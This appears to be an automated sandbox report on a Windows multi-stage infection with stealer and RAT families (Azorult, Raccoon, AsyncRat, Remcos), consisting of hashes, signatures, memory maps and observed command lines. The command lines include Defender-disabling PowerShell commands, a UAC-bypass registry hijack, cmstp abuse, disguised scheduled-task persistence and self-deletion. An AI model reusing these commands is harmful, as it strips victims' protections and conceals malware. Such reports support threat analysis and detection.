| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1008-277-0x0000000000000000-mapping.dmp
memory/1008-279-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/1620-285-0x00000000004019E4-mapping.dmp
Analysis: behavioral2
Detonation Overview
| Submitted | 2021-08-13 11:33 |
| Reported | 2021-08-13 11:36 |
| Platform | win10v20210408 |
| Max time kernel | 119s |
| Max time network | 159s |
Command Line
Signatures
AsyncRat
Azorult
Contains code to disable Windows Defender
Modifies Windows Defender Real-time Protection settings
Oski
Raccoon
Raccoon Stealer Payload
Remcos
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
Async RAT payload
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | N/A |
| N/A | N/A | C:\Windows\temp\h3gk1fsv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" | C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe" |
| C:\ProgramData\GFDyrtucbvfdg.exe | "C:\ProgramData\GFDyrtucbvfdg.exe" |
| C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | "C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe" |
| C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe" |
| C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | "C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe" |
| C:\ProgramData\GFDyrtucbvfdg.exe | "C:\ProgramData\GFDyrtucbvfdg.exe" |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c taskkill /pid 3620 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\852648917343331\\* & exit |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /pid 3620 |
| C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | "C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe" |
| C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe | "C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe" |
| C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | "C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe" |
| C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | "C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe" |
| C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | "C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe" |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe" |
| C:\Windows\SysWOW64\timeout.exe | timeout /T 10 /NOBREAK |
| C:\Windows\SysWOW64\mobsync.exe | C:\Windows\System32\mobsync.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" " |
| C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | "C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
| C:\Windows\SysWOW64\schtasks.exe | /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" |
| C:\Windows\SysWOW64\reg.exe | reg delete hkcu\Environment /v windir /f |
| C:\Windows\SysWOW64\reg.exe | reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" " |
| C:\Windows\SysWOW64\reg.exe | reg delete hkcu\Environment /v windir /f |
| C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | "{path}" |
| C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | "{path}" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell" Get-MpPreference -verbose |
| \??\c:\windows\SysWOW64\cmstp.exe | "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i2gwbrqy.inf |
| C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | "{path}" |
| C:\Windows\SysWOW64\DllHost.exe | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} |
| C:\Windows\SysWOW64\cmd.exe | cmd /c start C:\Windows\temp\h3gk1fsv.exe |
| C:\Windows\temp\h3gk1fsv.exe | C:\Windows\temp\h3gk1fsv.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" Get-MpPreference -verbose |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /IM cmstp.exe /F |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 |
| C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 |
Network
Files
memory/3728-116-0x0000000000680000-0x0000000000681000-memory.dmp
memory/2724-117-0x0000000000000000-mapping.dmp
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/3172-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/2724-127-0x00000000004D0000-0x00000000004D1000-memory.dmp
memory/3172-128-0x00000000007C0000-0x00000000007C1000-memory.dmp
memory/212-129-0x000000000044003F-mapping.dmp
memory/3728-130-0x0000000003550000-0x0000000003558000-memory.dmp
memory/3620-131-0x0000000000417A8B-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/1392-133-0x000000000041A684-mapping.dmp
memory/212-136-0x00000000005E0000-0x000000000072A000-memory.dmp
memory/212-135-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3620-137-0x0000000000400000-0x0000000000434000-memory.dmp
memory/3620-138-0x00000000001F0000-0x00000000001F1000-memory.dmp
memory/1392-139-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1392-140-0x0000000002010000-0x0000000002011000-memory.dmp
\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | f964811b68f9f1487c2b41e1aef576ce |
| SHA1 | b423959793f14b1416bc3b7051bed58a1034025f |
| SHA256 | 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7 |
| SHA512 | 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4 |
\ProgramData\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
| MD5 | 02cc7b8ee30056d5912de54f1bdfc219 |
| SHA1 | a6923da95705fb81e368ae48f93d28522ef552fb |
| SHA256 | 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5 |
| SHA512 | 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
| MD5 | eae9273f8cdcf9321c6c37c244773139 |
| SHA1 | 8378e2a2f3635574c106eea8419b5eb00b8489b0 |
| SHA256 | a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc |
| SHA512 | 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
| MD5 | 4e8df049f3459fa94ab6ad387f3561ac |
| SHA1 | 06ed392bc29ad9d5fc05ee254c2625fd65925114 |
| SHA256 | 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871 |
| SHA512 | 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA1 | 989f377b9117d7cb21cbe92a4117f88f9c7693d9 |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
| SHA512 | 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01 |
memory/3856-150-0x0000000000000000-mapping.dmp
memory/8-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/3732-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/3524-155-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
memory/3732-158-0x0000000000200000-0x0000000000201000-memory.dmp
memory/3728-160-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/3728-163-0x0000000000690000-0x0000000000691000-memory.dmp
memory/3524-165-0x00000000004C0000-0x000000000060A000-memory.dmp
memory/3732-166-0x0000000004A40000-0x0000000004AA6000-memory.dmp
memory/3732-167-0x0000000007460000-0x0000000007461000-memory.dmp
memory/3728-168-0x0000000004EC0000-0x0000000004F20000-memory.dmp
memory/1192-170-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/3728-172-0x0000000007510000-0x0000000007511000-memory.dmp
memory/1192-175-0x0000000000E80000-0x0000000000E81000-memory.dmp
memory/1344-178-0x0000000000000000-mapping.dmp
memory/1264-177-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/3728-181-0x0000000007480000-0x0000000007481000-memory.dmp
memory/1192-183-0x0000000005690000-0x00000000056F0000-memory.dmp
memory/3728-184-0x0000000004F50000-0x0000000004F51000-memory.dmp
memory/3732-186-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
memory/1264-188-0x00000000004C0000-0x000000000060A000-memory.dmp
memory/2372-190-0x0000000000000000-mapping.dmp
memory/3732-191-0x00000000023E0000-0x00000000023E2000-memory.dmp
memory/3732-193-0x0000000004C80000-0x0000000004C81000-memory.dmp
memory/1192-196-0x0000000005710000-0x0000000005711000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | e774e48339bb3205c7d0f4e4c3539a0f |
| SHA1 | c5a0297bc5ccfeee4bab58a5adf415bac0155e63 |
| SHA256 | 2b132ad40aeb3e7f8275c20082157abcd81eba769913e328157ca50ad72d72b7 |
| SHA512 | e4c569e22de23083ea8884baa2a8dd72601f31d791a2801c49c9c41479a3190d3377816e4346f7da00cb1315d5a8d9c83f03dcfbf01e54489d8e23169000c01e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 3eff1d28a83d7c01ebbd6fdbeeb51b9b |
| SHA1 | 4f34a875b74b9b002ab25fb2a95a18ce94fbb783 |
| SHA256 | 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43 |
| SHA512 | 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505 |
memory/2524-200-0x0000000000000000-mapping.dmp
memory/2612-201-0x0000000000000000-mapping.dmp
memory/2524-202-0x0000000000810000-0x0000000000811000-memory.dmp
memory/2524-203-0x0000000000870000-0x0000000000871000-memory.dmp
memory/2524-204-0x0000000010580000-0x00000000105F3000-memory.dmp
memory/3176-205-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-206-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-207-0x0000000000400000-0x0000000000405000-memory.dmp
C:\Users\Public\Trast.bat
| MD5 | 4068c9f69fcd8a171c67f81d4a952a54 |
| SHA1 | 4d2536a8c28cdcc17465e20d6693fb9e8e713b36 |
| SHA256 | 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810 |
| SHA512 | a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d |
memory/2920-211-0x0000000000000000-mapping.dmp
memory/3176-213-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-210-0x00000000004019E4-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4020-214-0x0000000000000000-mapping.dmp
C:\Users\Public\UKO.bat
| MD5 | eaf8d967454c3bbddbf2e05a421411f8 |
| SHA1 | 6170880409b24de75c2dc3d56a506fbff7f6622c |
| SHA256 | f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56 |
| SHA512 | fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9 |
memory/1372-216-0x0000000000000000-mapping.dmp
memory/3596-217-0x0000000000000000-mapping.dmp
memory/4000-218-0x0000000000000000-mapping.dmp
